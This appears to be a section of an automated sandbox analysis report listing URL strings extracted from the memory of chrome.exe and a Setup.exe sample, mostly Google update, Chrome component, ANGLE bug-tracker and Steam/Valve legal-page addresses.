Source: chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8229
Source: chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941158355.00006204005E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8280
Source: chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjhkYWYwZDctOTExOS00MGQ5LTgyNjAt
Source: chrome.exe, 00000002.00000002.2940561447.00006204004BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_third_pa
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.0/jamhcnnkihi
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/acccxbt6wwsvpxzpob4hojndwkqq_4.10.2830.0/oimompecagna
Source: chrome.exe, 00000002.00000002.2943659637.0000620400A44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/acy5mdne3lup4k7xyd5szdvx6hqa_477/lmelglejhemejginpboa
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8.0/gonpemdgkjce
Source: chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/eeigpng
Source: chrome.exe, 00000002.00000002.2943659637.0000620400A44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/ads7ltfl2gw6hxwgakn3sxrkoijq_9.53.0/gcmjkmgdlgnkkcocm
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/cpx7rw4q3nwu7emczqf2w6cu7y_2023.3.30.1305/cocncanleaf
Source: chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/cxmnq7ci5es7kes4fruun62via_2024.12.17.1202/ggkkehgbnf
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/fw4ggtylvtq6i65ti33m4vqijm_2024.12.14.1/kiabhabjdbkjd
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/neifaoindggfcji
Source: chrome.exe, 00000002.00000002.2943659637.0000620400A44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/j2hxfei2occ5siitujtlwgp6xi_3/ojhpjlocmbogdgmfpkhlaaea
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjhkYWYwZDctOTExOS00
Source: chrome.exe, 00000002.00000002.2944480980.0000620400C68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ac6mhlwypzipnufijdvfyhdgvt4q_67/khaoiebnd
Source: chrome.exe, 00000002.00000002.2940720564.00006204004F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.0
Source: chrome.exe, 00000002.00000002.2940720564.00006204004F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acccxbt6wwsvpxzpob4hojndwkqq_4.10.2830.0/
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acgz7p5akfecfxfz5dlgs3o2fisa_1174/efniojl
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acy5mdne3lup4k7xyd5szdvx6hqa_477/lmelglej
Source: chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2951057505.0000620403355000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2943690870.0000620400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8.0/
Source: chrome.exe, 00000002.00000002.2940720564.00006204004F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.23
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ads7ltfl2gw6hxwgakn3sxrkoijq_9.53.0/gcmjk
Source: chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/cpx7rw4q3nwu7emczqf2w6cu7y_2023.3.30.1305
Source: chrome.exe, 00000002.00000002.2940720564.00006204004F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/cxmnq7ci5es7kes4fruun62via_2024.12.17.120
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/eoxvpqsyhqbmcsgpe27edattly_3057/jflookgnk
Source: chrome.exe, 00000002.00000002.2940720564.00006204004F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/fw4ggtylvtq6i65ti33m4vqijm_2024.12.14.1/k
Source: chrome.exe, 00000002.00000002.2940720564.00006204004F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/nei
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/irpc4pc5k7rvcvkvdmlbguhli4_9429/hfnkpimlh
Source: chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945149057.0000620400D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://issuetracker.google.com/200067929
Source: chrome.exe, 00000002.00000003.1916921151.0000620401060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916877024.0000620400F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1917175520.000062040107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1917099128.0000620400F94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jsbin.com/temexa/4.
Source: chrome.exe, 00000002.00000003.1918543284.0000620400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916945926.00006204010B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918698794.000062040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918653153.0000620401144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916921151.0000620401060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916877024.0000620400F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918204826.0000620400794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1917175520.000062040107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918256122.0000620400FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918223939.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1917099128.0000620400F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2939482052.00006204002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 00000002.00000003.1918543284.0000620400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916945926.00006204010B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918698794.000062040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918653153.0000620401144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916921151.0000620401060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916877024.0000620400F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918204826.0000620400794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1917175520.000062040107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918256122.0000620400FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918223939.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1917099128.0000620400F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2939482052.00006204002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chrome.exe, 00000002.00000003.1918543284.0000620400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916945926.00006204010B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918698794.000062040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918653153.0000620401144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916921151.0000620401060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916877024.0000620400F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918204826.0000620400794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1917175520.000062040107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918256122.0000620400FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918223939.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1917099128.0000620400F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2939482052.00006204002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 00000002.00000003.1918543284.0000620400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916945926.00006204010B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918698794.000062040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918653153.0000620401144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916921151.0000620401060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916877024.0000620400F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918204826.0000620400794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1917175520.000062040107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918256122.0000620400FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918223939.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1917099128.0000620400F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2939482052.00006204002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945335945.0000620400DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjhkYWYwZDctOTExOS0
Source: chrome.exe, 00000002.00000002.2944480980.0000620400C68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64
Source: chrome.exe, 00000002.00000002.2946374708.00006204010E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/V3P1l2hLvLw_7/7_all_sslErrorAssistant.cr
Source: Setup.exe, 00000000.00000003.1834175101.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1858083111.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: Setup.exe, 00000000.00000003.1834175101.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1858083111.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: Setup.exe, 00000000.00000003.1834175101.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1858083111.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjhkYWYwZDctOTExOS00MGQ5LTgy
Source: chrome.exe, 00000002.00000002.2940561447.00006204004BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_thir
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.0/jamhcnn
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/acccxbt6wwsvpxzpob4hojndwkqq_4.10.2830.0/oimompec
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/acy5mdne3lup4k7xyd5szdvx6hqa_477/lmelglejhemejgin
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8.0/gonpemdg
Source: chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/eei
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/ads7ltfl2gw6hxwgakn3sxrkoijq_9.53.0/gcmjkmgdlgnkk
Source: chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/cpx7rw4q3nwu7emczqf2w6cu7y_2023.3.30.1305/cocncan
Source: chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/cxmnq7ci5es7kes4fruun62via_2024.12.17.1202/ggkkeh
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/fw4ggtylvtq6i65ti33m4vqijm_2024.12.14.1/kiabhabjd
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/neifaoindgg
Source: chrome.exe, 00000002.00000002.2943659637.0000620400A44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/j2hxfei2occ5siitujtlwgp6xi_3/ojhpjlocmbogdgmfpkhl
Source: chrome.exe, 00000002.00000002.2943472168.00006204009F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.gstatic.com/generate_204
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: chrome.exe, 00000002.00000002.2938468818.00006204000AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000002.00000002.2940210207.000062040041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945559398.0000620400E3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945302084.0000620400DD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000002.00000002.2939291138.00006204001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000002.00000002.2939291138.00006204001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000002.00000002.2939291138.00006204001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout1
Source: chrome.exe, 00000002.00000002.2939291138.00006204001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 00000002.00000002.2939291138.00006204001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 00000002.00000003.1935679655.00006204002B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
Source: chrome.exe, 00000002.00000003.1935679655.00006204002B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
Source: chrome.exe, 00000002.00000002.2938503762.00006204000C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000002.00000002.2938503762.00006204000C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000002.00000002.2938503762.00006204000C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000002.00000002.2938468818.00006204000AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000002.00000002.2938468818.00006204000AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxABb
Source: chrome.exe, 00000002.00000002.2939291138.00006204001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com:443
Source: chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941515657.000062040068C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941515657.000062040068C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941515657.000062040068C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942124853.0000620400730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2940384726.0000620400484000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941515657.000062040068C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
